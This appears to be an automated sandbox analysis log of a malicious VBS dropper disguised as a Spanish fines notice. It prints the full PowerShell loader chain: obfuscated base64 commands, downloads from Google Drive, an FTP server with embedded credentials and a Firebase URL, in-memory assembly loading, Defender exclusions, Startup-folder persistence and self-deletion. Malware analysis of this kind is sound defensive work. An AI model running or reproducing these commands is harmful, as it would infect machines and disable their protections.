                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_05EA8D1715_2_05EA8D17
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_05EAAEBB15_2_05EAAEBB
                        Source: Oficio notificacion multas y sanciones.vbsInitial sample: Strings found which are bigger than 50
                        Source: Process Memory Space: powershell.exe PID: 2748, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: Process Memory Space: powershell.exe PID: 1088, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: Process Memory Space: powershell.exe PID: 5792, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: Process Memory Space: powershell.exe PID: 7428, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: Process Memory Space: powershell.exe PID: 7656, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winVBS@38/30@4/4
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\x2.ps1Jump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5352:120:WilError_03
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7384:120:WilError_03
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\a388ab2ca3be4
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8156:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j2xvaybo.sc4.ps1Jump to behavior
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs"
                        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9???Ds???KQ???g???Ck???I??????n???GU???dQBy???HQ???Jw???g???Cw???I???BY???F??????VQB1???Gg???J??????g???Cw???I??????n???Gg???d???B0???H??????cw???6???C8???LwBm???Gk???cgBl???GI???YQBz???GU???cwB0???G8???cgBh???Gc???ZQ???u???Gc???bwBv???Gc???b???Bl???GE???c???Bp???HM???LgBj???G8???bQ???v???HY???M??????v???GI???LwBk???GU???cwBj???GE???cgBn???GE???cw???t???GQ???Yw???0???GQ???Ng???u???GE???c???Bw???HM???c???Bv???HQ???LgBj???G8???bQ???v???G8???LwBl???G4???dgBp???G8???cw???t???G4???dQBl???HY???bwBz???C4???d???B4???HQ???PwBh???Gw???d??????9???G0???ZQBk???Gk???YQ???m???HQ???bwBr???GU???bg???9???GM???ZQ???2???Dk???M???Bh???DY???M??????t???Dc???O???Bl???GI???LQ???0???D??????MQBi???C0???YgBm???GM???Ng???t???DE???Z???Bj???Dg???Mg???1???GU???MQ???5???DQ???Yg???y???Cc???I??????o???C??????XQBd???Fs???d???Bj???GU???agBi???G8???Ww???g???Cw???I???Bs???Gw???dQBu???CQ???I??????o???GU???awBv???HY???bgBJ???C4???KQ???g???Cc???SQBW???EY???cgBw???Cc???I??????o???GQ???bwBo???HQ???ZQBN???HQ???ZQBH???C4???KQ???n???DE???cwBz???GE???b???BD???C4???MwB5???HI???YQBy???GI???aQBM???HM???cwBh???Gw???Qw???n???Cg???ZQBw???Hk???V???B0???GU???Rw???u???Ck???I???Ba???GM???QgBj???GE???J??????g???Cg???Z???Bh???G8???T??????u???G4???aQBh???G0???bwBE???HQ???bgBl???HI???cgB1???EM???Og???6???F0???bgBp???GE???bQBv???EQ???c???Bw???EE???LgBt???GU???d???Bz???Hk???UwBb???Ds???KQ???g???Ck???I??????n???EE???Jw???g???Cw???I??????n???JMhOgCTISc???I??????o???GU???YwBh???Gw???c???Bl???FI???LgBn???FM???egBD???EI???b??????k???C??????K???Bn???G4???aQBy???HQ???Uw???0???DY???ZQBz???GE???QgBt???G8???cgBG???Do???OgBd???HQ???cgBl???HY???bgBv???EM???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Fo???YwBC???GM???YQ???k???C??????XQBd???Fs???ZQB0???Hk???QgBb???Ds???Jw???l???Ek???a???Bx???FI???W??????l???Cc???I??????9???C??????W???BQ???FU???dQBo???CQ???Ow???p???C??????ZwBT???Ho???QwBC???Gw???J??????g???Cg???ZwBu???Gk???cgB0???FM???Z???Bh???G8???b???Bu???Hc???bwBE???C4???egB0???Hg???a??????k???C??????PQ???g???Gc???UwB6???EM???QgBs???CQ???Ow???4???EY???V???BV???Do???OgBd???Gc???bgBp???GQ???bwBj???G4???RQ???u???HQ???e???Bl???FQ???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Gc???bgBp???GQ???bwBj???G4???RQ???u???Ho???d???B4???Gg???J??????7???Ck???d???Bu???GU???aQBs???EM???YgBl???Fc???LgB0???GU???Tg???g???HQ???YwBl???Go???YgBP???C0???dwBl???E4???K??????g???D0???I???B6???HQ???e???Bo???CQ???Ow???p???Cg???ZQBz???G8???c???Bz???Gk???Z??????u???Ho???d???B4???Gg???J??????7???Ck???I??????n???HQ???e???B0???C4???MQ???w???Ew???T???BE???C8???MQ???w???C8???cgBl???HQ???c???B5???HI???YwBw???FU???LwBy???GI???LgBt???G8???Yw???u???HQ???YQBy???GI???dgBr???GM???cwBl???GQ???LgBw???HQ???ZgB??????DE???d???Bh???HI???YgB2???Gs???YwBz???GU???Z??????v???C8???OgBw???HQ???Zg???n???C??????K???Bn???G4???aQBy???HQ???UwBk???GE???bwBs???G4???dwBv???EQ???LgB6???HQ???e???Bo???CQ???I??????9???C??????ZwBT???Ho???Qw
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$hxtz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $hxtz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$hxtz.dispose();$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $hxtz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '2b491e528cd1-6cfb-b104-be87-06a096ec=nekot&aidem=tla?txt.soveun-soivne/o/moc.topsppa.6d4cd-sagracsed/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $huUPX , 'true' ) );};"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c mkdir "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c del "C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C Y /N /D Y /T 1 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9???Ds???KQ???g???Ck???I??????n???GU???dQBy???HQ???Jw???g???Cw???I???BY???F??????VQB1???Gg???J??????g???Cw???I??????n???Gg???d???B0???H??????cw???6???C8???LwBm???Gk???cgBl???GI???YQBz???GU???cwB0???G8???cgBh???Gc???ZQ???u???Gc???bwBv???Gc???b???Bl???GE???c???Bp???HM???LgBj???G8???bQ???v???HY???M??????v???GI???LwBk???GU???cwBj???GE???cgBn???GE???cw???t???GQ???Yw???0???GQ???Ng???u???GE???c???Bw???HM???c???Bv???HQ???LgBj???G8???bQ???v???G8???LwBl???G4???dgBp???G8???cw???t???G4???dQBl???HY???bwBz???C4???d???B4???HQ???PwBh???Gw???d??????9???G0???ZQBk???Gk???YQ???m???HQ???bwBr???GU???bg???9???GM???ZQ???2???Dk???M???Bh???DY???M??????t???Dc???O???Bl???GI???LQ???0???D??????MQBi???C0???YgBm???GM???Ng???t???DE???Z???Bj???Dg???Mg???1???GU???MQ???5???DQ???Yg???y???Cc???I??????o???C??????XQBd???Fs???d???Bj???GU???agBi???G8???Ww???g???Cw???I???Bs???Gw???dQBu???CQ???I??????o???GU???awBv???HY???bgBJ???C4???KQ???g???Cc???SQBW???EY???cgBw???Cc???I??????o???GQ???bwBo???HQ???ZQBN???HQ???ZQBH???C4???KQ???n???DE???cwBz???GE???b???BD???C4???MwB5???HI???YQBy???GI???aQBM???HM???cwBh???Gw???Qw???n???Cg???ZQBw???Hk???V???B0???GU???Rw???u???Ck???I???Ba???GM???QgBj???GE???J??????g???Cg???Z???Bh???G8???T??????u???G4???aQBh???G0???bwBE???HQ???bgBl???HI???cgB1???EM???Og???6???F0???bgBp???GE???bQBv???EQ???c???Bw???EE???LgBt???GU???d???Bz???Hk???UwBb???Ds???KQ???g???Ck???I??????n???EE???Jw???g???Cw???I??????n???JMhOgCTISc???I??????o???GU???YwBh???Gw???c???Bl???FI???LgBn???FM???egBD???EI???b??????k???C??????K???Bn???G4???aQBy???HQ???Uw???0???DY???ZQBz???GE???QgBt???G8???cgBG???Do???OgBd???HQ???cgBl???HY???bgBv???EM???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Fo???YwBC???GM???YQ???k???C??????XQBd???Fs???ZQB0???Hk???QgBb???Ds???Jw???l???Ek???a???Bx???FI???W??????l???Cc???I??????9???C??????W???BQ???FU???dQBo???CQ???Ow???p???C??????ZwBT???Ho???QwBC???Gw???J??????g???Cg???ZwBu???Gk???cgB0???FM???Z???Bh???G8???b???Bu???Hc???bwBE???C4???egB0???Hg???a??????k???C??????PQ???g???Gc???UwB6???EM???QgBs???CQ???Ow???4???EY???V???BV???Do???OgBd???Gc???bgBp???GQ???bwBj???G4???RQ???u???HQ???e???Bl???FQ???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Gc???bgBp???GQ???bwBj???G4???RQ???u???Ho???d???B4???Gg???J??????7???Ck???d???Bu???GU???aQBs???EM???YgBl???Fc???LgB0???GU???Tg???g???HQ???YwBl???Go???YgBP???C0???dwBl???E4???K??????g???D0???I???B6???HQ???e???Bo???CQ???Ow???p???Cg???ZQBz???G8???c???Bz???Gk???Z??????u???Ho???d???B4???Gg???J??????7???Ck???I??????n???HQ???e???B0???C4???MQ???w???Ew???T???BE???C8???MQ???w???C8???cgBl???HQ???c???B5???HI???YwBw???FU???LwBy???GI???LgBt???G8???Yw???u???HQ???YQBy???GI???dgBr???GM???cwBl???GQ???LgBw???HQ???ZgB??????DE???d???Bh???HI???YgB2???Gs???YwBz???GU???Z??????v???C8???OgBw???HQ???Zg???n???C??????K???Bn???G4???aQBy???HQ???UwBk???GE???bwBs???G4???dwBv???EQ???LgB6???HQ???e???Bo???CQ???I??????9???C??????ZwBT???Ho???QwJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$hxtz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $hxtz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$hxtz.dispose();$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $hxtz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '2b491e528cd1-6cfb-b104-be87-06a096ec=nekot&aidem=tla?txt.soveun-soivne/o/moc.topsppa.6d4cd-sagracsed/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $huUPX , 'true' ) );};"Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c mkdir "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\"Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1"Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c del "C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs"Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C Y /N /D Y /T 1 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
